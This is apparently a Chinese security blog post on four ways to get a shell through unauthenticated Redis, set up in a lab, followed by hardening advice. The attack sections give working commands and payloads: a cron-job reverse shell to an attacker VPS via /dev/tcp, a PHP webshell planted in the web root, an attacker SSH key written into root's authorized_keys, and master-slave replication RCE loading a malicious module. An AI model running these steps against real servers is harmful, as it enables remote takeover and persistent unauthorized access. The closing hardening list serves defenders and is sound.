redis未授权getshell的4种方式

前言

  redis未授权漏洞或弱口令一直是很有用的渗透突破口,最近正好闲的无事就拿redis来测试一些,做一个简单的收集,方便自己日后的回顾。

漏洞描述

  Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作

环境搭建

  Redis下载地址:http://download.redis.io/releases/redis-4.0.2.tar.gz

解压并进入其目录

tar xf redis-4.0.2.tar.gz /n
编译源程序
make
cd src
make install PREFIX=/usr/local/redis
将配置文件移动到redis目录
mv /server/tools/redis-4.0.2/redis.conf /usr/local/redis/ect/

  编辑etc中的redis配置文件redis.conf

允许别的主机进行连接
bind 127.0.0.1改为 #bind 127.0.0.1
关闭保护模式
protected-mode yes改为protected-mode no
启动redis服务
/usr/local/redis/bin/redis-server /usr/local/redis/ect/redis.conf

任务计划反弹shell

  vps上开启监听

nc -lvp 55555

  链接redis

redis-cli -h 10.91.214.205
set x "\n* * * * * bash -i >& /dev/tcp/vps ip/55555 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

image

  写入成功

image

  但vps上并没有反弹成功的信息,查了半天文章发现好像就contos能写任务计划,最后在contos中反弹shell成功。

写webshell

  链接redis:

redis-cli -h 10.91.214.205
CONFIG SET dir /var/www/html
CONFIG SET dbfilename shell.php
SET shell "<?php system($_GET['cmd']);?>"
save

image

  写入成功

image

写密钥

  利用条件:
  Redis服务使用ROOT账号启动
  服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

cd /root/.ssh/
创建密钥
ssh-keygen -t rsa
密钥保存为1.txt文件
(echo -e "\n\n"; cat 1.pub; echo -e "\n\n") > 1.txt
将密钥写入redis的1中
cat /root/.ssh/1.txt | redis-cli -h 10.91.214.205 -x set 1

image

  链接redis

redis-cli -h 10.91.214.205 
get 1  
config set dir /root/.ssh/
config set dbfilename authorized_keys
save

image

  写入成功

image

  ssh -i /root/.ssh/id_rsa root@10.91.214.205 #ssh链接

image

主从复制rce

  下载:git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
  make进行编译
  git clone https://github.com/Ridter/redis-rce.git
  python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so
image
  so文件是通过RedisModules make生成的

修复建议

1)禁止一些高危命令(重启redis才能生效)
  修改 redis.conf 文件,禁用远程修改 DB 文件地址
    rename-command FLUSHALL ""
    rename-command CONFIG ""
    rename-command EVAL ""
  或者通过修改redis.conf文件,改变这些高危命令的名称
    rename-command FLUSHALL "name1"
    rename-command CONFIG "name2"
    rename-command EVAL "name3"

2)以低权限运行 Redis 服务(重启redis才能生效)
  为 Redis 服务创建单独的用户和家目录,并且配置禁止登陆
    groupadd -r redis && useradd -r -g redis redis

3)为 Redis 添加密码验证(重启redis才能生效)
  修改 redis.conf 文件,添加
    requirepass mypassword
    (注意redis不要用-a参数,明文输入密码,连接后使用auth认证)

4)禁止外网访问 Redis(重启redis才能生效)
  修改 redis.conf 文件,添加或修改,使得 Redis 服务只在当前主机可用
    bind 127.0.0.1
  在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错。

5)修改默认端口
  修改配置文件redis.conf文件
    Port 6379
  默认端口是6379,可以改变成其他端口(不要冲突就好)

6)保证 authorized_keys 文件的安全
  为了保证安全,您应该阻止其他用户添加新的公钥。将 authorized_keys 的权限设置为对拥有者只读,其他用户没有任何权限:
    chmod 400 ~/.ssh/authorized_keys
  为保证 authorized_keys 的权限不会被改掉,您还需要设置该文件的 immutable 位权限:
    chattr +i ~/.ssh/authorized_keys
  然而,用户还可以重命名 ~/.ssh,然后新建新的 ~/.ssh 目录和 authorized_keys 文件。要避免这种情况,需要设置 ~./ssh 的 immutable 权限:
    chattr +i ~/.ssh

7)设置防火墙策略
  如果正常业务中Redis服务需要被其他服务器来访问,可以设置iptables策略仅允许指定的IP来访问Redis服务。

参考文章

https://www.freebuf.com/articles/web/249238.html Redis系列漏洞总结

posted @ 2021-08-19 15:29  one-seven  阅读(4865)  评论(0编辑  收藏  举报